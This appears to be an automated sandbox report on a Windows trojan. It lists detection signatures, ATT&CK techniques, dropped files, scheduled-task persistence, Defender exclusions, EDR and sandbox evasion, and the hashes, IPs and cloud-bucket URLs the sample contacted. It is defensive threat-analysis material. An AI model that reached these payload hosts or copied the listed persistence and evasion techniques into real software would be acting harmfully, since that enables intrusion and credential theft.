              Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 41.2.qNHTRl.exe.42403e8.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 41.2.qNHTRl.exe.10000000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 41.2.qNHTRl.exe.42403e8.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: qNHTRl.exe PID: 5052, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 41.2.qNHTRl.exe.42403e8.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 41.2.qNHTRl.exe.10000000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 41.2.qNHTRl.exe.42403e8.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: qNHTRl.exe PID: 5052, type: MEMORYSTR
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,5_2_00000001400042B0
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,5_2_0000000140003F80
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Native API
              1
              DLL Side-Loading
              1
              Abuse Elevation Control Mechanism
              1
              Disable or Modify Tools
              1
              Credential API Hooking
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts113
              Command and Scripting Interpreter
              33
              Windows Service
              1
              DLL Side-Loading
              1
              Abuse Elevation Control Mechanism
              LSASS Memory4
              File and Directory Discovery
              Remote Desktop Protocol1
              Credential API Hooking
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts11
              Scheduled Task/Job
              11
              Scheduled Task/Job
              1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              Security Account Manager223
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts12
              Service Execution
              1
              Registry Run Keys / Startup Folder
              33
              Windows Service
              1
              DLL Side-Loading
              NTDS331
              Security Software Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
              Process Injection
              32
              Masquerading
              LSA Secrets1
              Process Discovery
              SSHKeylogging3
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
              Scheduled Task/Job
              1
              Modify Registry
              Cached Domain Credentials11
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
              Registry Run Keys / Startup Folder
              11
              Virtualization/Sandbox Evasion
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
              Process Injection
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584634 Sample: 2749837485743-7684385786.05.exe Startdate: 06/01/2025 Architecture: WINDOWS Score: 100 75 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 2->75 77 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com 2->77 79 5 other IPs or domains 2->79 87 Suricata IDS alerts for network traffic 2->87 89 Malicious sample detected (through community Yara rule) 2->89 91 Antivirus detection for dropped file 2->91 93 7 other signatures 2->93 9 7tqorj.exe 25 2->9         started        14 2749837485743-7684385786.05.exe 1 24 2->14         started        16 7tqorj.exe 2->16         started        18 9 other processes 2->18 signatures3 process4 dnsIp5 83 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 118.178.60.9, 443, 49992, 49993 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 9->83 63 C:\Program Files (x86)\qNHTRl\tbcore3U.dll, PE32 9->63 dropped 65 C:\Program Files (x86)\qNHTRl\qNHTRl.exe, PE32 9->65 dropped 67 C:\Users\Public\Music\destopbak.ini, MIPSEB 9->67 dropped 107 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->107 109 Found direct / indirect Syscall (likely to bypass EDR) 9->109 20 qNHTRl.exe 4 5 9->20         started        25 cmd.exe 1 9->25         started        27 cmd.exe 1 9->27         started        35 2 other processes 9->35 85 sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com 39.103.20.26, 443, 49921, 49931 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 14->85 69 C:\Windows\System32\drivers\189atohci.sys, PE32+ 14->69 dropped 71 C:\Users\user\Documents\vselog.dll, PE32+ 14->71 dropped 73 C:\Users\user\Documents\7tqorj.exe, PE32+ 14->73 dropped 111 Drops PE files to the document folder of the user 14->111 113 Sample is not signed and drops a device driver 14->113 115 Tries to detect virtualization through RDTSC time measurements 14->115 117 Uses cmd line tools excessively to alter registry or file data 18->117 29 reg.exe 1 1 18->29         started        31 reg.exe 1 1 18->31         started        33 reg.exe 1 1 18->33         started        37 5 other processes 18->37 file6 signatures7 process8 dnsIp9 81 8.217.59.73, 50000, 8917 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 20->81 59 C:\Program Files (x86)\2U36F\tbcore3U.dll, PE32 20->59 dropped 61 C:\Program Files (x86)\2U36F61roRNr.exe, PE32 20->61 dropped 95 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 20->95 97 Creates an undocumented autostart registry key 20->97 99 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 20->99 39 cmd.exe 20->39         started        101 Uses cmd line tools excessively to alter registry or file data 25->101 103 Uses schtasks.exe or at.exe to add and modify task schedules 25->103 41 conhost.exe 25->41         started        43 schtasks.exe 1 25->43         started        51 2 other processes 25->51 45 conhost.exe 27->45         started        53 3 other processes 27->53 105 Adds extensions / path to Windows Defender exclusion list (Registry) 29->105 47 conhost.exe 35->47         started        49 conhost.exe 35->49         started        55 6 other processes 35->55 file10 signatures11 process12 process13 57 conhost.exe 39->57         started       

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              2749837485743-7684385786.05.exe3%ReversingLabs
              2749837485743-7684385786.05.exe3%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Program Files (x86)\2U36F\tbcore3U.dll100%AviraTR/Redcap.vdzex
              C:\Program Files (x86)\qNHTRl\tbcore3U.dll100%AviraTR/Redcap.vdzex
              C:\Program Files (x86)\2U36F\tbcore3U.dll100%Joe Sandbox ML
              C:\Program Files (x86)\qNHTRl\tbcore3U.dll100%Joe Sandbox ML
              C:\Program Files (x86)\2U36F\NroRNr.exe0%ReversingLabs
              C:\Program Files (x86)\qNHTRl\qNHTRl.exe0%ReversingLabs
              C:\Users\Public\Music\destopbak.ini0%ReversingLabs
              C:\Users\user\Documents\7tqorj.exe0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-510%Avira URL Cloudsafe
              https://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gifz0%Avira URL Cloudsafe
              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg0%Avira URL Cloudsafe
              http://%s/%d.dllC:0%Avira URL Cloudsafe
              https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
              https://hu5wd1.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
              https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gif20%Avira URL Cloudsafe
              https://hu5wd1.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
              http://%s/%d.dll0%Avira URL Cloudsafe
              http://%s/upx.rarC:0%Avira URL Cloudsafe
              https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gif=UY0%Avira URL Cloudsafe
              http://%s/ip.txtC:0%Avira URL Cloudsafe
              https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gifi0%Avira URL Cloudsafe
              https://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
              https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gifRU50%Avira URL Cloudsafe
              http://%s/ip.txt0%Avira URL Cloudsafe
              https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg0%Avira URL Cloudsafe
              https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gift0%Avira URL Cloudsafe
              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg0%Avira URL Cloudsafe
              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg0%Avira URL Cloudsafe
              https://hu5wd1.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
              https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
              http://%s/upx.rar0%Avira URL Cloudsafe
              https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gify0%Avira URL Cloudsafe
              https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gif;0%Avira URL Cloudsafe
              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg0%Avira URL Cloudsafe
              https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gifhttps://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gifhttp0%Avira URL Cloudsafe
              https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com
              118.178.60.9
              truefalse
                unknown
                sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com
                39.103.20.26
                truefalse
                  unknown
                  oheykp.net
                  unknown
                  unknownfalse
                    unknown
                    22mm.oss-cn-hangzhou.aliyuncs.com
                    unknown
                    unknownfalse
                      unknown
                      hu5wd1.oss-cn-beijing.aliyuncs.com
                      unknown
                      unknownfalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.giffalse
                        • Avira URL Cloud: safe
                        unknown
                        https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpgfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://hu5wd1.oss-cn-beijing.aliyuncs.com/s.datfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.giffalse
                        • Avira URL Cloud: safe
                        unknown
                        https://hu5wd1.oss-cn-beijing.aliyuncs.com/s.jpgfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://hu5wd1.oss-cn-beijing.aliyuncs.com/b.giffalse
                        • Avira URL Cloud: safe
                        unknown
                        https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpgfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://hu5wd1.oss-cn-beijing.aliyuncs.com/i.datfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.giffalse
                        • Avira URL Cloud: safe
                        unknown
                        https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://22mm.oss-cn-hangzhou.aliyuncs.com/f.datfalse
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-517tqorj.exe, 00000007.00000003.2996806877.0000000003DE2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://%s/%d.dllqNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://ocsp.thawte.com02749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 7tqorj.exe.0.drfalse
                          high
                          https://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gifz2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://%s/%d.dllC:qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.symauth.com/cps0(2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drfalse
                            high
                            https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gif22749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://%s/upx.rarC:qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gif=UY2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://%s/ip.txtC:qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://crl.thawte.com/ThawteTimestampingCA.crl02749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 7tqorj.exe.0.drfalse
                              high
                              http://www.symauth.com/rpa002749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drfalse
                                high
                                https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gifi2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gifRU52749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://%s/ip.txtqNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gift2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://%s/upx.rarqNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gify2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gif;2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gifhttps://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gifhttp2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                8.217.59.73
                                unknownSingapore
                                45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                118.178.60.9
                                sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                                37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                39.103.20.26
                                sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                                37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1584634
                                Start date and time:2025-01-06 04:49:03 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 9m 28s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Run name:Run with higher sleep bypass
                                Number of analysed new started processes analysed:48
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:2749837485743-7684385786.05.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@65/29@14/3
                                EGA Information:
                                • Successful, ratio: 50%
                                HCA Information:
                                • Successful, ratio: 61%
                                • Number of executed functions: 12
                                • Number of non-executed functions: 111
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target 7tqorj.exe, PID 504 because there are no executed function
                                • Execution Graph export aborted for target qNHTRl.exe, PID 5052 because there are no executed function
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                TimeTypeDescription
                                04:50:54Task SchedulerRun new task: ovvqa path: C:\Users\user\Documents\7tqorj.exe
                                04:51:49Task SchedulerRun new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 6niIP path: C:\Program Files (x86)\2U36F\NroRNr.exe
                                04:51:49Task SchedulerRun new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 LkMaj path: C:\Program Files (x86)\qNHTRl\qNHTRl.exe
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                118.178.60.92b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                  45631.exeGet hashmaliciousNitolBrowse
                                    0000000000000000.exeGet hashmaliciousNitolBrowse
                                      T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                        • 118.178.60.9
                                        45631.exeGet hashmaliciousNitolBrowse
                                        • 118.178.60.9
                                        0000000000000000.exeGet hashmaliciousNitolBrowse
                                        • 118.178.60.9
                                        T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                        • 118.178.60.9
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdcZO.exeGet hashmaliciousUnknownBrowse
                                        • 120.77.100.135
                                        z0r0.m68k.elfGet hashmaliciousMiraiBrowse
                                        • 8.133.115.153
                                        2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                        • 39.103.20.34
                                        2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                        • 39.103.20.34
                                        N5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                        • 101.201.227.94
                                        N5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                        • 101.201.227.94
                                        3.elfGet hashmaliciousUnknownBrowse
                                        • 8.189.180.251
                                        3.elfGet hashmaliciousUnknownBrowse
                                        • 8.138.48.163
                                        armv6l.elfGet hashmaliciousUnknownBrowse
                                        • 223.4.27.34
                                        CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdcZO.exeGet hashmaliciousUnknownBrowse
                                        • 120.77.100.135
                                        z0r0.m68k.elfGet hashmaliciousMiraiBrowse
                                        • 8.133.115.153
                                        2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                        • 39.103.20.34
                                        2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                        • 39.103.20.34
                                        N5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                        • 101.201.227.94
                                        N5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                        • 101.201.227.94
                                        3.elfGet hashmaliciousUnknownBrowse
                                        • 8.189.180.251
                                        3.elfGet hashmaliciousUnknownBrowse
                                        • 8.138.48.163
                                        armv6l.elfGet hashmaliciousUnknownBrowse
                                        • 223.4.27.34
                                        CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCFantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                        • 8.213.155.157
                                        Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                        • 47.245.235.159
                                        z0r0.x86.elfGet hashmaliciousMiraiBrowse
                                        • 8.209.129.226
                                        2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                        • 8.217.47.169
                                        armv7l.elfGet hashmaliciousUnknownBrowse
                                        • 8.212.89.249
                                        Josho.x86.elfGet hashmaliciousUnknownBrowse
                                        • 47.235.55.179
                                        file.exeGet hashmaliciousXRedBrowse
                                        • 47.254.187.72
                                        file.exeGet hashmaliciousXRedBrowse
                                        • 47.254.187.72
                                        https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtmlGet hashmaliciousHTMLPhisherBrowse
                                        • 47.253.61.56
                                        45631.exeGet hashmaliciousNitolBrowse
                                        • 8.217.152.240
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        37f463bf4616ecd445d4a1937da06e19drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                        • 39.103.20.26
                                        • 118.178.60.9
                                        ZT0KQ1PC.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                        • 39.103.20.26
                                        • 118.178.60.9
                                        LinxOptimizer.exeGet hashmaliciousUnknownBrowse
                                        • 39.103.20.26
                                        • 118.178.60.9
                                        setup.msiGet hashmaliciousUnknownBrowse
                                        • 39.103.20.26
                                        • 118.178.60.9
                                        drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                        • 39.103.20.26
                                        • 118.178.60.9
                                        2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                        • 39.103.20.26
                                        • 118.178.60.9
                                        2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                        • 39.103.20.26
                                        • 118.178.60.9
                                        K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                        • 39.103.20.26
                                        • 118.178.60.9
                                        IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                        • 39.103.20.26
                                        • 118.178.60.9
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Program Files (x86)\2U36F\NroRNr.exe2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                          45631.exeGet hashmaliciousNitolBrowse
                                            0000000000000000.exeGet hashmaliciousNitolBrowse
                                              T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                                setup.ic19.exeGet hashmaliciousGhostRat, NitolBrowse
                                                  Process:C:\Program Files (x86)\qNHTRl\qNHTRl.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):54152
                                                  Entropy (8bit):6.64786972992462
                                                  Encrypted:false
                                                  SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                  MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                  SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                  SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                  SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
